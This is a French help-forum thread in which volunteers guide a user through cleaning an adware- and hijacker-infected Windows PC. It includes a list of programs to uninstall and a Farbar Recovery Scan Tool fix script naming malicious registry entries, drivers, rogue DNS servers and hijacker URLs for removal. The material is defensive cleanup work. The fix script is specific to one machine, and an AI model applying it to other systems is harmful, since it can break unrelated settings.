Votre question
Résolu

virus spams malwares

Tags :
  • Malware
  • Spam
  • hijacker
  • Virus
  • Adware
  • Internet
  • Sécurité
Dernière réponse : dans Sécurité et virus
16 Avril 2017 20:23:13

Bonjour à toutes et tous,

Je m’adresse à vous en espérant pouvoir retrouver les capacités normales de mon ordinateur. J’ai eu la mauvaise idée d’essayer de récupérer un sous-titre pour un film et depuis internet se lance sans que je le demande et les ressources de mon ordinateur sont extrêmement ralenties. L’usage d’internet est devenu quasiment impossible tant les fenêtres s’ouvrent dans tous les sens, bref c’est cauchemardesque et mes notions dans le domaine sont bien trop modestes pour y remédier.
Je joins les rapports produits par Farbar Recovery Scan Tool qui j’espère parleront à certains d’entre vous, vous trouverez le lien ici : http://pjjoint.malekal.com/files.php?id=20170416_p6o9p5...

Merci d’avance pour votre précieuse aide et bon week end.

Autres pages sur : virus spams malwares

a c 1009 8 Sécurité
a c 273 2 Internet
17 Avril 2017 07:22:21

Bonjour,

Il manque le rapport FRST.txt qui est enregistré dans ton dossier Téléchargements.

Tu peux l'héberger et poster le lien obtenu ?

Si tu pouvais aussi utiliser ce site d'hébergement -> http://security-x.fr/up/
les rapports y sont plus faciles à lire.
Merci,

@+

m
0
l
Contenus similaires
17 Avril 2017 10:36:52


Bonjour benjaminclarens,

Je m'appelle Misterybean. Je suis actuellement en formation sécurité , je vais te prendre en charge sur ton problème.
Toutes mes réponses seront validées par un expert en sécurité avant de te les poster :) .

Je regarde tes rapports et te donne la marche

:) 
m
0
l
17 Avril 2017 22:36:24

Bonjour,

-->Tu as été infecté avec ton consentement , tu dois faire attention aux options cochés par défaut lors de l'installation de programmes ,
et privilégier le site de l'éditeur pour le téléchargement de ces derniers


Ton PC est très infecté , c'est une chance qu'il fonctionne encore

Programmes à désinstaller , si problème de désinstallation ou absent , passe au suivant


--> amulesw
--> BikaQ Rss
--> Chromium
--> Fix It
--> Search the Web (Yahoo)
--> Stremio (streaming , vecteur d'infection)
--> Update_msi
--> WinSnare
--> Yahoo! Powered
--> Microtool version 1.1.0
--> Privacy Protector Plus v3.0 (Sauf si réelle utilité)

**********

IMPORTANT : --> Déplace FRST (copie/colle) sur ton BUREAU , car là , il se trouve dans DOWNLOADS
Exécuté depuis C:\Users\benjamin clarens\Downloads

**********

Il semble que tu ait un crack pour OFFICE
  1. Task: {1D2EB95E-AFCC-4E16-8A52-18409AE839DB} - System32\Tasks\KMS => C:\Windows\Setup\Office.bat [2010-05-20] () <==== ATTENTION


Supprime le si possible car cela peut interférer avec le correctif et l'empêcher d'aboutir , de plus Il existe des alternatives gratuites à Microsoft Office, notamment LibreOffice ou open office

**********

Ensuite , on va effectué un correctif avec FRST :

  • Ouvre le Bloc-notes Touches Windows + R , tape notepad puis valide (touche entrée)
  • Copie/colle la totalité du contenu de la zone Code ci-dessous dans le Bloc-notes



  • start
    CreateRestorePoint:
    CloseProcesses:
    HKLM\...\Run: [gplyra] => C:\Users\benjamin clarens\AppData\Roaming\gplyra\gplyra.exe [1538048 2017-02-05] () <===== ATTENTION
    HKLM-x32\...\RunOnce: [window.bat] => C:\Windows\window.bat [59 2017-01-05] ()
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\...\Run: [Chromium] => c:\users\benjamin clarens\appdata\local\chromium\application\chrome.exe [1068544 2016-03-19] (The Chromium Authors)
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\...\Run: [cacaoweb] => C:\Users\benjamin clarens\AppData\Roaming\cacaoweb\cacaoweb.exe [563896 2016-08-23] ()
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\...\Run: [GoogleChromeAutoLaunch_6E2FD1BCC9E2943C40FBCA492561151C] => C:\Users\benjamin clarens\AppData\Local\Chromium\Application\chrome.exe [1068544 2016-03-19] (The Chromium Authors)
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\...\Run: [msiql] => C:\Users\benjamin clarens\AppData\Local\Temp\00004038\msiql.exe [2072064 2017-02-23] () <===== ATTENTION
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\...\Run: [R45FQDSD4V] => C:\Program Files\INWWM2OFMJ\INWWM2OFM.exe [722944 2017-03-10] (QSHYUHH)
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\...\Run: [K013SM37HG] => C:\Program Files\DAG1UJI6CY\DAG1UJI6C.exe [722944 2017-03-10] (QSHYUHH)
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\...\Run: [R9PJ1RJ8T7] => C:\Program Files\HMZ19LB4IV\HMZ19LB4I.exe [867328 2017-03-13] (P6I)
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\...\Run: [JDVEQNRYIU] => C:\Program Files\UB6GHKH5HS\UB6GHKH5H.exe [867328 2017-03-13] (P6I)
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\...\Run: [79NDOMP1SW] => C:\Program Files\7MOMK01QAH\7MOMK01QA.exe [671232 2017-03-14] (P%4)
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\...\Run: [CH07JTKGWJ] => C:\Program Files\OZQAYGWY34\OZQAYGWY3.exe [671232 2017-03-14] (P%4)
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\...\Run: [BCW5XFEHFV] => C:\Program Files\8UCBB5FQ22\8UCBB5FQ2.exe [737792 2017-03-14] (K)
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\...\Run: [SZN7B4CYK9] => C:\Program Files\4JXXYLK6X6\4JXXYLK6X.exe [947712 2017-03-14] (I@)
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\...\Run: [L2WAYJD7CU] => C:\Program Files\ZXF4PPAPSP\ZXF4PPAPS.exe [947712 2017-03-14] (I@)
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\...\Run: [2ATBJDEXU8] => C:\Program Files\2G5Q3J5DA7\2G5Q3J5DA.exe [844288 2017-03-15] (Y7UWP3)
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\...\Run: [NNKOFUFCRF] => C:\Program Files\2JW8ZQH5P3\2JW8ZQH5P.exe [844288 2017-03-15] (Y7UWP3)
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\...\Run: [TVF58E25VU] => C:\Program Files\IWGH70LEGR\IWGH70LEG.exe [826368 2017-03-16] (B@)
    HKLM\...\Providers\0pz2kw65: C:\Program Files (x86)\Showeckshefik Manager\local64spl.dll [307712 2017-02-23] ()
    ShellExecuteHooks: Pas de nom - {FB3AB442-F44A-11E6-81B1-64006A5CFC23} - C:\Program Files (x86)\Platcerhesy\Qiltstoqagh.dll [146432 2017-02-23] ()
    ShellExecuteHooks: Pas de nom - {E5B0040C-038F-11E7-9862-64006A5CFC23} - -> Pas de fichier
    GroupPolicy: Restriction <======= ATTENTION
    GroupPolicyScripts: Restriction <======= ATTENTION
    GroupPolicyScripts\User: Restriction <======= ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
    Tcpip\Parameters: [NameServer] 82.163.143.157 82.163.142.159
    Tcpip\..\Interfaces\{786c5b22-99f0-4ded-a999-55e461649a42}: [NameServer] 82.163.143.157 82.163.142.159
    Tcpip\..\Interfaces\{786c5b22-99f0-4ded-a999-55e461649a42}: [DhcpNameServer] 82.163.143.157
    Tcpip\..\Interfaces\{b87673c3-f5fa-46a6-8e2e-4f2f0c4f3097}: [NameServer] 82.163.143.157 82.163.142.159
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.startpageing123.com/?type=hp&ts=1490119695&z=c754beb19cf61a6801a5767gfz0t2edgagct7qft6o&from=che0812&uid=3219913727_263907_C6F43FE3
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.startpageing123.com/?type=hp&ts=1490119695&z=c754beb19cf61a6801a5767gfz0t2edgagct7qft6o&from=che0812&uid=3219913727_263907_C6F43FE3
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1488964241&z=14df41b7c98498133f4792fgazdbcbbt7qcz4o0z3g&from=che0812&uid=3219913727_263907_C6F43FE3&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1488964241&z=14df41b7c98498133f4792fgazdbcbbt7qcz4o0z3g&from=che0812&uid=3219913727_263907_C6F43FE3&q={searchTerms}
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1490119695&z=c754beb19cf61a6801a5767gfz0t2edgagct7qft6o&from=che0812&uid=3219913727_263907_C6F43FE3
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1490119695&z=c754beb19cf61a6801a5767gfz0t2edgagct7qft6o&from=che0812&uid=3219913727_263907_C6F43FE3
    HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1488964241&z=14df41b7c98498133f4792fgazdbcbbt7qcz4o0z3g&from=che0812&uid=3219913727_263907_C6F43FE3&q={searchTerms}
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1488964241&z=14df41b7c98498133f4792fgazdbcbbt7qcz4o0z3g&from=che0812&uid=3219913727_263907_C6F43FE3&q={searchTerms}
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.startpageing123.com/search/?type=ds&ts=1490119695&z=c754beb19cf61a6801a5767gfz0t2edgagct7qft6o&from=che0812&uid=3219913727_263907_C6F43FE3&q={searchTerms}
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://fr.search.yahoo.com/yhs/web?hspart=arh&hsimp=yhs-001&type=zxy_aa626590561bf11519¶m1=ArFaIWVoNqArQGMVHFFoNqAqBbFaITAbQGR7xTVoN9I4y7IsQGR7B7JoN9JbDSk8vFE9GqQANFdcFCk8vmpdJCoVNVBdISIYvFE9J6k3wVQ4IGYVwVVdIqYUwVU9GqYVNUI3wGYGwVM3vCIWvFE9GqUNNos3wCIYwVA9Jmk3wVA4ICITvFI4ICILNFdcJ6k8NoFcFGUMwVU9JmITwVU9ImoVwV5cGWUSNFRcEqULNopcGWUIvmFbF6IYNVVdJmIWwVRdIGYTNVM9I6oWNVE4IWYTwVxdJCk4vFI4J6ISvFNdJCk4vFI9I6IWvFQ9JCIYvFFdICk3wVI4ICoUwVI9JGQIwV5cGGUTNFRbDqUDNF5bDGUNNEU3wGQGvFM3vmk4vFE3vmoWvFE4JmISNVA9Jmk3vFQ9I6oUwVU3vCIYwVw3vGYYwVNdICISvmk3vCk4wVVdJGYYNVFdJCoWwVU9ISoUNoU9GqYYNVc3wCIVQGR7B6RoN9JcMWBbMWNcLWt6QGR7BHFaISopzU0aCaV6CaVaC6wfAo0kxo1cMo1aNHFbMn0aC6AoxrFaIWVdOqZoNqAexbFaIUwkynIew6NoNpRcNXFbJoYbyd%3D%3D¶m2=MGp7MGpbLGB8
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.startpageing123.com/?type=hp&ts=1490119695&z=c754beb19cf61a6801a5767gfz0t2edgagct7qft6o&from=che0812&uid=3219913727_263907_C6F43FE3
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1490119695&z=c754beb19cf61a6801a5767gfz0t2edgagct7qft6o&from=che0812&uid=3219913727_263907_C6F43FE3&q={searchTerms}
    SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=arh&hsimp=yhs-001&type=zxy_e7bca55504e8a986bb¶m1=ArFaIWJoNqArQGMVHFFoNqAqBbFaITAbQGR7xTVoN9I4y7IsQGR7B7JoN9JbDSk8vFE9GqQANFdcFCk8vmpdJCoVNVBdISIYvFE9J6k3wVQ4IGYVwVVdIqYUwVU9GqYVNUI3wGYGwVM3vmk3wVM9GqUNNos3wCIYwVA9JmoVwVA9J6ITvFI4ISILNFdcJ6k8NoFcFGUMwVU9JmITwVU9ImoVwV5cGWUSNFRcEqULNopcGWUIvmFbF6IXNVU9JmIXNVI4JmIXNVQ9I6oWwVNdJaYYwVw4IGYVNVI9ISISvFQ4IWYXNVM9IaYUNVFdJmIYvFI9J6oWvmpdJqYXvmk4JaQIwV5cGGUTNFRbDqUDNF5bDGUNNEU3wGQGvFM3vmk4vFE3vmoWvFE4JmISNVA9Jmk3vFQ9I6oUwVU3vCIYwVw3vGYYwVNdICISvmk3vCk4wVVdJGYYNVFdJCoWwVU9ISoUNoU9GqYYNVc3wCIXQGR7B6RoN9JcLGp9LGNaMaVcQGR7BHFaISopzU0aCaV6CaZ5C6wfAo0kxo1cMo1aNHFbMn0aC6AoxrFaIWVdOqZoNqAexbFaIUwkynIew6NoNpRcNXFbJoYbyd%3D%3D¶m2=NqVdNqp6LWVcMd%3D%3D&p={searchTerms}
    SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=arh&hsimp=yhs-001&type=zxy_e7bca55504e8a986bb¶m1=ArFaIWJoNqArQGMVHFFoNqAqBbFaITAbQGR7xTVoN9I4y7IsQGR7B7JoN9JbDSk8vFE9GqQANFdcFCk8vmpdJCoVNVBdISIYvFE9J6k3wVQ4IGYVwVVdIqYUwVU9GqYVNUI3wGYGwVM3vmk3wVM9GqUNNos3wCIYwVA9JmoVwVA9J6ITvFI4ISILNFdcJ6k8NoFcFGUMwVU9JmITwVU9ImoVwV5cGWUSNFRcEqULNopcGWUIvmFbF6IXNVU9JmIXNVI4JmIXNVQ9I6oWwVNdJaYYwVw4IGYVNVI9ISISvFQ4IWYXNVM9IaYUNVFdJmIYvFI9J6oWvmpdJqYXvmk4JaQIwV5cGGUTNFRbDqUDNF5bDGUNNEU3wGQGvFM3vmk4vFE3vmoWvFE4JmISNVA9Jmk3vFQ9I6oUwVU3vCIYwVw3vGYYwVNdICISvmk3vCk4wVVdJGYYNVFdJCoWwVU9ISoUNoU9GqYYNVc3wCIXQGR7B6RoN9JcLGp9LGNaMaVcQGR7BHFaISopzU0aCaV6CaZ5C6wfAo0kxo1cMo1aNHFbMn0aC6AoxrFaIWVdOqZoNqAexbFaIUwkynIew6NoNpRcNXFbJoYbyd%3D%3D¶m2=NqVdNqp6LWVcMd%3D%3D&p={searchTerms}
    SearchScopes: HKU\S-1-5-21-4209607850-1710769735-1240733433-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=arh&hsimp=yhs-001&type=zxy_aa626590561bf11519¶m1=ArFaIWJoNqArQGMVHFFoNqAqBbFaITAbQGR7xTVoN9I4y7IsQGR7B7JoN9JbDSk8vFE9GqQANFdcFCk8vmpdJCoVNVBdISIYvFE9J6k3wVQ4IGYVwVVdIqYUwVU9GqYVNUI3wGYGwVM3vCIWvFE9GqUNNos3wCIYwVA9Jmk3wVA4ICITvFI4ICILNFdcJ6k8NoFcFGUMwVU9JmITwVU9ImoVwV5cGWUSNFRcEqULNopcGWUIvmFbF6IYNVVdJmIWwVRdIGYTNVM9I6oWNVE4IWYTwVxdJCk4vFI4J6ISvFNdJCk4vFI9I6IWvFQ9JCIYvFFdICk3wVI4ICoUwVI9JGQIwV5cGGUTNFRbDqUDNF5bDGUNNEU3wGQGvFM3vmk4vFE3vmoWvFE4JmISNVA9Jmk3vFQ9I6oUwVU3vCIYwVw3vGYYwVNdICISvmk3vCk4wVVdJGYYNVFdJCoWwVU9ISoUNoU9GqYYNVc3wCIVQGR7B6RoN9JcMWBbMWNcLWt6QGR7BHFaISopzU0aCaV6CaVaC6wfAo0kxo1cMo1aNHFbMn0aC6AoxrFaIWVdOqZoNqAexbFaIUwkynIew6NoNpRcNXFbJoYbyd%3D%3D¶m2=NaFdNGFdLGRc&p={searchTerms}
    SearchScopes: HKU\S-1-5-21-4209607850-1710769735-1240733433-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=arh&hsimp=yhs-001&type=zxy_aa626590561bf11519¶m1=ArFaIWJoNqArQGMVHFFoNqAqBbFaITAbQGR7xTVoN9I4y7IsQGR7B7JoN9JbDSk8vFE9GqQANFdcFCk8vmpdJCoVNVBdISIYvFE9J6k3wVQ4IGYVwVVdIqYUwVU9GqYVNUI3wGYGwVM3vCIWvFE9GqUNNos3wCIYwVA9Jmk3wVA4ICITvFI4ICILNFdcJ6k8NoFcFGUMwVU9JmITwVU9ImoVwV5cGWUSNFRcEqULNopcGWUIvmFbF6IYNVVdJmIWwVRdIGYTNVM9I6oWNVE4IWYTwVxdJCk4vFI4J6ISvFNdJCk4vFI9I6IWvFQ9JCIYvFFdICk3wVI4ICoUwVI9JGQIwV5cGGUTNFRbDqUDNF5bDGUNNEU3wGQGvFM3vmk4vFE3vmoWvFE4JmISNVA9Jmk3vFQ9I6oUwVU3vCIYwVw3vGYYwVNdICISvmk3vCk4wVVdJGYYNVFdJCoWwVU9ISoUNoU9GqYYNVc3wCIVQGR7B6RoN9JcMWBbMWNcLWt6QGR7BHFaISopzU0aCaV6CaVaC6wfAo0kxo1cMo1aNHFbMn0aC6AoxrFaIWVdOqZoNqAexbFaIUwkynIew6NoNpRcNXFbJoYbyd%3D%3D¶m2=NaFdNGFdLGRc&p={searchTerms}
    SearchScopes: HKU\S-1-5-21-4209607850-1710769735-1240733433-1001 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.startpageing123.com/search/?type=ds&ts=1490119695&z=c754beb19cf61a6801a5767gfz0t2edgagct7qft6o&from=che0812&uid=3219913727_263907_C6F43FE3&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-4209607850-1710769735-1240733433-1001 -> {f79e5d1c-5148-469e-9f98-a11d8d7863f4} URL = hxxps://fr.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wnf_ir_16_31¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dfr%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzuzy0AyD0F0DtAyEtCzztByE0DtA0F0EtAtN0D0Tzu0StCyCyByBtN1L2XzutAtFtByEtFyCtFtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2StCyEzyyBtD0CyBtDtGtD0F0DyBtGyDyEtAzytGyCzz0F0BtG0DzyyEyByBtAtAyEyD0EyCyB2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyCzzzyyEzzyCyEyBtG0FtBzzyBtGyEtAzytAtGzy0AtC0EtGzzzyzytA0A0A0E0AyCtAtDyE2QtN0A0LzuyE%26cr%3D1479182626%26a%3Dwnf_ir_16_31%26os_ver%3D10.0%26os%3DWindows%2B10%2BPro&p={searchTerms}
    Edge HomeButtonPage: HKU\S-1-5-21-4209607850-1710769735-1240733433-1001 -> hxxp://www.startpageing123.com/?type=hp&ts=1488964241&z=14df41b7c98498133f4792fgazdbcbbt7qcz4o0z3g&from=che0812&uid=3219913727_263907_C6F43FE3
    FF Extension: (SimilarWeb) - C:\Users\benjamin clarens\AppData\Roaming\Firefox\Firefox\Profiles\lt3yorkw.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi [2017-03-30] [non signé]
    FF Extension: (FF Adr) - C:\Users\benjamin clarens\AppData\Roaming\Firefox\Firefox\Profiles\lt3yorkw.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi [2017-03-30] [non signé]
    FF SearchPlugin: C:\Users\benjamin clarens\AppData\Roaming\Firefox\Firefox\Profiles\lt3yorkw.default\searchplugins\startsearch.xml [2017-03-30]
    HKU\S-1-5-21-4209607850-1710769735-1240733433-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Hotcine\Application\chrome.exe (Google Inc.) <==== ATTENTION
    R2 clean; C:\Users\benjamin clarens\AppData\Roaming\clean\kyubey.exe [113664 2017-03-27] (Kyubey.exe) [Fichier non signé]
    R2 ed2kidle; C:\Program Files (x86)\amulell\ed2k.exe [214528 2017-03-10] (hxxp://www.amuleall.org/) [Fichier non signé]
    R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [107696 2017-03-29] ()
    S2 GoogleChromeUpService; C:\ProgramData\service.exe [1620992 2017-02-23] () [Fichier non signé] <==== ATTENTION
    R2 Kitty; C:\Users\benjamin clarens\AppData\Local\Kitty\cat.exe [230912 2017-04-13] (kitty.exe) [Fichier non signé]
    R2 Kyubey; C:\Users\benjamin clarens\AppData\Roaming\Kyubey\Kyubey.exe [239104 2017-03-31] () [Fichier non signé]
    R2 NetUtils2016srv; C:\WINDOWS\SysWOW64\NetUtils2016.exe [470592 2017-02-23] ()
    R2 OtherSearch; C:\Program Files (x86)\W4ZYsxEVVq\kl.dll [1009152 2017-03-13] () [Fichier non signé] <==== ATTENTION
    R2 WinSAPSvc; C:\Users\benjamin clarens\AppData\Roaming\WinSAPSvc\WinSAP.dll [553984 2017-04-13] (winsap) [Fichier non signé]
    R1 dc6dc7d702d89aa0e337959f07d94a0a; C:\WINDOWS\system32\drivers\dc6dc7d702d89aa0e337959f07d94a0a.sys [96272 2017-02-20] (UOYM62) <==== ATTENTION
    R1 Lace514; C:\WINDOWS\System32\drivers\Lace_wpf_x64.sys [69400 2017-03-01] (Lace514)
    R1 NetUtils2016; C:\WINDOWS\system32\drivers\NetUtils2016.sys [909944 2017-03-10] () <==== ATTENTION
    2017-04-16 18:40 - 2017-04-16 18:40 - 00003994 _____ C:\WINDOWS\System32\Tasks\{A53B684B-1290-DFE0-CF57-EAC0B124E679}
    2017-04-16 18:40 - 2017-04-16 18:40 - 00000000 ____D C:\ProgramData\{3AAB57A7-8D00-E00C-103C-F8EDD04E49E4}
    2017-04-16 18:40 - 2017-04-16 18:40 - 00000000 ____D C:\ProgramData\{3a5c0618-512c-1}
    2017-04-16 18:40 - 2017-04-16 18:40 - 00000000 ____D C:\ProgramData\{1bb97cfd-012c-0}
    2017-04-16 18:39 - 2017-04-16 18:40 - 00000000 ____D C:\ProgramData\4eb44678-5af3-0
    2017-04-16 18:39 - 2017-04-16 18:40 - 00000000 ____D C:\ProgramData\4eb44678-3367-1
    2017-04-16 18:39 - 2017-04-16 18:39 - 00000000 ____D C:\ProgramData\8fb64dc4-4683-0
    2017-04-13 14:27 - 2017-04-13 14:27 - 00000000 ____D C:\Users\benjamin clarens\AppData\Local\SNARE
    2017-04-13 14:27 - 2017-04-13 14:27 - 00000000 ____D C:\Users\benjamin clarens\AppData\Local\Kitty
    2017-04-12 12:54 - 2017-04-12 12:54 - 00003612 _____ C:\WINDOWS\System32\Tasks\Windows-PG
    2017-04-12 12:54 - 2017-04-12 12:54 - 00000000 ____D C:\Program Files\0pz2kw65
    2017-04-12 09:55 - 2017-04-12 09:55 - 00000000 ____D C:\Update
    2017-04-12 09:27 - 2017-04-12 09:27 - 00000000 ____D C:\ProgramData\8fb64dc4-3d05-0
    2017-04-12 09:27 - 2017-04-12 09:27 - 00000000 ____D C:\ProgramData\8fb64dc4-2c61-1
    2017-04-11 10:36 - 2017-04-11 10:36 - 00000000 ____D C:\Users\benjamin clarens\AppData\Local\SNARER
    2017-04-11 10:36 - 2017-04-11 10:36 - 00000000 ____D C:\Users\benjamin clarens\AppData\Local\AMD
    2017-04-09 21:59 - 2017-04-12 09:06 - 00000000 ____D C:\ProgramData\4eb44678-7f53-1
    2017-04-09 21:59 - 2017-04-12 09:06 - 00000000 ____D C:\ProgramData\4eb44678-1025-0
    2017-04-02 10:37 - 2017-04-02 10:37 - 00000000 ____D C:\Program Files (x86)\temp
    2017-03-31 19:44 - 2017-03-31 19:44 - 00000000 ____D C:\Program Files (x86)\WinSnare(4.4.3)
    2017-03-30 18:45 - 2017-03-30 18:45 - 00000000 ____D C:\Users\benjamin clarens\AppData\Local\Hotcine
    2017-03-30 18:44 - 2017-04-16 18:42 - 00002417 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2017-03-30 18:44 - 2017-04-16 18:42 - 00002347 _____ C:\Users\Public\Desktop\Google Chrome.lnk
    2017-03-30 18:44 - 2017-03-30 18:44 - 00000000 ____D C:\Program Files (x86)\Hotcine
    2017-03-30 18:43 - 2017-04-16 18:47 - 00000000 ____D C:\Users\benjamin clarens\AppData\LocalLow\Mozilla
    2017-03-30 18:43 - 2017-04-16 18:42 - 00002264 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
    2017-03-30 18:43 - 2017-04-16 18:42 - 00002194 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
    2017-03-30 18:43 - 2017-04-13 13:53 - 00000088 _____ C:\Users\Public\Documents\temp.dat
    2017-03-30 18:43 - 2017-03-30 18:43 - 00000000 ____D C:\Users\benjamin clarens\AppData\Roaming\Mozilla
    2017-03-30 18:43 - 2017-03-30 18:43 - 00000000 ____D C:\Users\benjamin clarens\AppData\Roaming\Firefox
    2017-03-30 18:43 - 2017-03-30 18:43 - 00000000 ____D C:\Users\benjamin clarens\AppData\Local\Firefox
    2017-03-30 18:43 - 2017-03-30 18:43 - 00000000 ____D C:\Program Files (x86)\Firefox
    2017-03-30 18:42 - 2017-04-16 18:41 - 00000000 _____ C:\Users\Public\Documents\report.dat
    2017-03-27 15:08 - 2017-04-03 15:06 - 00000000 ____D C:\Program Files (x86)\W4ZYsxEVVq
    2017-03-27 15:08 - 2017-03-27 15:08 - 00002052 _____ C:\WINDOWS\System32\Tasks\19OX7lo687
    2017-03-27 15:08 - 2017-03-27 15:08 - 00000000 ____D C:\Users\benjamin clarens\AppData\Roaming\clean
    2017-03-26 21:59 - 2017-03-30 16:32 - 00000000 ____D C:\ProgramData\4eb44678-5a41-1
    2017-03-26 21:59 - 2017-03-30 16:32 - 00000000 ____D C:\ProgramData\4eb44678-2b61-0
    2017-03-21 20:08 - 2017-03-21 20:08 - 00000000 ____D C:\Users\benjamin clarens\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\amuleC
    2017-03-21 20:08 - 2017-03-21 20:08 - 00000000 ____D C:\Program Files (x86)\amulell
    2017-04-16 18:40 - 2017-02-24 22:54 - 00000000 ____D C:\ProgramData\{951BBF79-22B0-08D2-7946-65D9CCCA2180}
    2017-04-16 18:40 - 2017-02-24 22:54 - 00000000 ____D C:\ProgramData\{456EE1D1-F2C5-567A-1A2F-04337023E6EB}
    2017-04-16 18:39 - 2016-08-04 10:09 - 00000000 ____D C:\ProgramData\{080BCD68-8249-47AE-048F-D9EC9ECD5222}
    2017-04-13 14:27 - 2017-02-27 17:53 - 00003672 _____ C:\WINDOWS\System32\Tasks\Milimili
    2017-04-13 14:27 - 2017-02-27 17:53 - 00000000 ____D C:\Users\benjamin clarens\AppData\Roaming\WinSAPSvc
    2017-04-12 12:54 - 2017-03-10 10:03 - 00000000 ____D C:\Program Files (x86)\Qumase
    2017-04-12 11:48 - 2017-03-14 20:56 - 00000000 _____ C:\WINDOWS\SysWOW64\1
    2017-04-12 09:54 - 2017-03-13 08:44 - 00000000 ____D C:\Program Files (x86)\3l78r5kp
    2017-04-09 00:41 - 2016-08-23 22:48 - 00000000 ____D C:\Users\benjamin clarens\AppData\Roaming\cacaoweb
    2017-04-03 15:06 - 2017-02-23 23:44 - 00000228 _____ C:\WINDOWS\web.bat
    2017-04-03 15:06 - 2017-02-23 23:42 - 00625272 _____ C:\WINDOWS\system32\NetUtils2016.dll
    2017-03-31 15:09 - 2017-03-09 10:27 - 00000000 ____D C:\ProgramData\8fb64dc4-0f41-0
    2017-03-30 18:42 - 2017-03-08 11:10 - 00000000 _____ C:\WINDOWS\SysWOW64\4
    2017-03-30 18:42 - 2017-03-08 11:10 - 00000000 _____ C:\WINDOWS\SysWOW64\3
    2017-03-30 16:32 - 2017-03-13 13:18 - 00000000 ____D C:\ProgramData\{75da6a5e-412c-1}
    2017-03-30 16:32 - 2017-03-13 13:18 - 00000000 ____D C:\ProgramData\{19657aff-612c-0}
    2017-03-30 16:32 - 2017-03-09 10:22 - 00000000 ____D C:\ProgramData\8fb64dc4-7873-0
    2017-03-27 15:08 - 2017-03-10 08:55 - 00000002 _____ C:\END
    2017-03-26 23:06 - 2017-03-10 08:54 - 00000000 ____D C:\Users\benjamin clarens\AppData\Roaming\Lamkpruzi
    2017-03-26 23:06 - 2017-02-23 23:43 - 00000000 ____D C:\Program Files\Common Files\Noobzo
    2017-03-26 22:55 - 2017-03-08 11:10 - 00000000 ____D C:\Users\benjamin clarens\AppData\Roaming\aMule
    2017-03-22 16:15 - 2017-03-13 08:45 - 00003342 _____ C:\WINDOWS\System32\Tasks\BikaQ_FetchAndUpgrade_CanBeDel
    2017-03-22 16:15 - 2017-03-13 08:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BikaQ
    2017-03-22 16:15 - 2017-02-28 16:59 - 00000000 ____D C:\Program Files (x86)\BikaQRss
    2017-03-22 16:14 - 2017-02-24 22:56 - 00000000 ____D C:\Program Files (x86)\0pz2kw65
